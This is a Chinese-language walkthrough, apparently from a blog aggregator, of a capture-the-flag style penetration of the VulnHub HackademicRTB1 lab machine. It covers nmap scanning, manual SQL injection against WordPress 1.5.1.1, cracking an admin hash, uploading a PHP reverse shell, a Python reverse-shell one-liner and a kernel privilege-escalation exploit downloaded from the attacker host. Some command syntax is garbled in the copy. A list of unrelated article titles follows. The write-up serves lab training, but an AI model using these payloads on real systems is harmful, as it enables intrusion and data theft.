当前位置：首页 > article >正文

红队实战：HackademicRTB1靶机渗透全流程解析（vulnhub）

article 2026/4/16 9:35:17

1. 靶机环境搭建与初始扫描这个HackademicRTB1靶机是VulnHub上非常经典的渗透测试练习环境特别适合红队演练手工注入和提权技术。我建议大家在VMware中配置NAT网络模式这样可以避免很多网络连接问题。记得启动时选择我已移动该虚拟机否则可能会遇到网卡不识别的情况。靶机启动后我们需要先确定它的IP地址。这里我习惯用nmap进行快速扫描nmap -sn 10.10.10.0/24这个命令会扫描整个网段存活的主机。找到靶机IP后假设是10.10.10.132接着进行详细端口扫描nmap --min-rate 10000 -p- 10.10.10.132 nmap -sT -sV -O -p22,80 10.10.10.132从扫描结果可以看到这个靶机只开放了80端口Apache服务22端口虽然存在但处于closed状态。操作系统内核版本显示为2.6.x这个信息对后续的提权非常重要。我通常会再用漏洞脚本扫描确认下基本情况nmap --scriptvuln -p80 10.10.10.1322. Web应用渗透与信息收集访问靶机80端口页面显示这是个黑客学院挑战。关键线索在target链接点击后会跳转到/Hackademic_RTB1/目录。查看页面源代码时我在注释中发现重要信息!-- This site is powered by WordPress 1.5.1.1 --WordPress 1.5.1.1是个很老的版本立即用searchsploit搜索漏洞searchsploit wordpress 1.5.1.1结果显示存在多个SQL注入漏洞。在探索网站时我发现Uncategorized分类页面的URL包含cat参数http://10.10.10.132/Hackademic_RTB1/?cat1测试SQL注入最直接的方法就是加单引号http://10.10.10.132/Hackademic_RTB1/?cat1页面返回了数据库错误信息暴露了完整的SQL查询语句SELECT * FROM wp_categories WHERE cat_ID 1\\\ LIMIT 1这个报错非常理想不仅确认存在注入点还展示了查询结构为后续注入提供了明确方向。3. 手工SQL注入实战确定注入点后我首先用order by判断列数http://10.10.10.132/Hackademic_RTB1/?cat1 order by 5当测试到order by 6时报错确认有5列。接着构造联合查询http://10.10.10.132/Hackademic_RTB1/?cat0 union select 1,2,3,4,5发现数字2会回显到页面于是利用这个位置注入信息。先获取数据库版本http://10.10.10.132/Hackademic_RTB1/?cat0 union select 1,version(),3,4,5接下来需要获取WordPress的用户凭证。通过查询wp_users表结构http://10.10.10.132/Hackademic_RTB1/?cat0 union select 1,group_concat(user_login,0x2d,user_pass),3,4,5 from wp_users获取到管理员用户GeorgeMiller的密码哈希7cbb3252ba6b7e9c422fac5334d22054。用在线工具破解后得到明文密码q1w2e3。4. WordPress后台利用与Shell获取使用获取的凭证登录/wp-admin后台。在Options Miscellaneous中开启文件上传功能添加php到允许上传的扩展名。然后上传包含以下代码的shell.php?php exec(/bin/bash -c bash -i /dev/tcp/10.10.10.128/1234 01); ?在Kali上启动监听nc -lvnp 1234访问上传的shell.php文件路径后成功获得反向Shell。为了更好的交互体验我用Python升级Shellpython -c import pty;pty.spawn(/bin/bash)5. 内核提权与权限提升当前是apache用户权限查看内核版本uname -a显示为2.6.31这是个很老的内核。搜索可用漏洞searchsploit linux kernel 2.6.3 | grep -i Privilege Escalation选择15285.c这个漏洞先在Kali上搭建临时web服务php -S 0.0.0.0:80在靶机上下载并编译cd /tmp wget http://10.10.10.128/15285.c gcc 15285.c -o exploit chmod x exploit ./exploit执行后成功提权到root最后读取flagcat /root/key.txt6. 技术要点与踩坑记录在这个靶机演练中有几个关键技术点值得注意SQL注入技巧通过0x2d(减号)分隔符使查询结果更易读这个技巧在实际渗透中非常实用。联合查询时要注意用0作为无效ID值确保只执行我们的查询语句。WordPress版本识别老版本WordPress的注释中经常包含版本信息这是快速识别CMS版本的有效方法。Shell稳定性处理获得初始Shell后一定要立即用Python升级为完整TTY否则很多命令无法正常使用。如果连接不稳定可以考虑用以下命令创建持久化连接python -c import socket,subprocess,os;ssocket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((10.10.10.128,1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);psubprocess.call([/bin/bash,-i]);内核漏洞选择面对多个可用漏洞时优先选择与目标系统匹配度高的漏洞。我最初尝试的10018.c就失败了因为它是针对特定发行版的。MySQL提权失败分析虽然发现了MySQL root密码但UDF提权失败的原因是plugin目录权限不足。这个经验告诉我们提权前一定要先检查目录写入权限ls -la /usr/lib/mysql/plugin/

红队实战：HackademicRTB1靶机渗透全流程解析（vulnhub）

相关文章：

红队实战：HackademicRTB1靶机渗透全流程解析（vulnhub）

硬件工程师选型避坑指南：从XTAL到VC-OCXO，5分钟搞懂晶振关键参数怎么选

TI DSP F28335 Bootloader进阶：自己动手实现带协议解析的串口升级上位机

【实战指南】conda环境配置与优化全攻略

基于Halcon与C#的PCB焊接缺陷智能检测系统开发实战（附完整项目资源）

终极中文Figma界面汉化指南：3分钟实现全中文设计环境

手机号查询QQ号：30秒快速找回账号的Python解决方案

为什么传统K8s Service在多模态场景下全面失能？——基于eBPF+TensorRT-LLM定制化负载均衡器的0day级设计手记

抖音批量下载工具终极指南：轻松保存无水印视频和用户作品

Spring Cloud项目启动就报错？手把手教你解决Nacos配置中心缺失时的‘No spring.config.import set‘问题

工业4.0时代下基于Python的智能制造设备状态实时监控系统设计与实现在工业

多模态Prompt工程的“暗物质”：视觉token对齐偏差、跨模态温度系数、指令嵌入偏移——3个被论文忽略但决定成败的关键参数

Ubuntu/Windows双系统远程切换方案

WarcraftHelper终极指南：魔兽争霸3全版本辅助工具完全解析

QNAP NAS性能调优：将SWAP文件迁移至SSD以突破I/O瓶颈

题解：洛谷 B2002 Hello,World!

一键捕获完整网页：终极Chrome扩展教程，告别手动拼接时代

WorkshopDL：跨平台游戏模组生态的技术架构与实践

别再手动调参了！手把手教你用伺服驱动器的自整定功能搞定电机参数（附避坑清单）

GPT-6：AI从搜索引擎进化为超级应用，OpenAI能否引领未来？

保姆级教程：用ResNet34训练鸟类识别模型后，如何一键转成ONNX格式（附完整代码）

泛化能力基础：AI 适应新数据的关键

手把手调参：APF-RRT*算法中的zeta、eta、d0到底怎么设？附Matlab避坑指南

AI应用实践：制作一个支持超长计算公式的计算器，计算内容只包含加减乘除算法，保存在一个HTML文件中

5步终极配置：让PS4/PS5手柄在PC上发挥完整游戏潜力的专业指南

深入解析WebRTC协议在FFmpeg中的推流与拉流实现

StructBERT在网络安全中的应用：恶意邮件与钓鱼文本相似度识别

告别虚拟机！在Ubuntu 22.04上用Wine一步到位安装Source Insight 4.0（附汉化与破解教程）

BetterNCM安装器完整指南：3步解锁网易云音乐无限潜力

go-quai开发者指南：如何为Quai Network贡献代码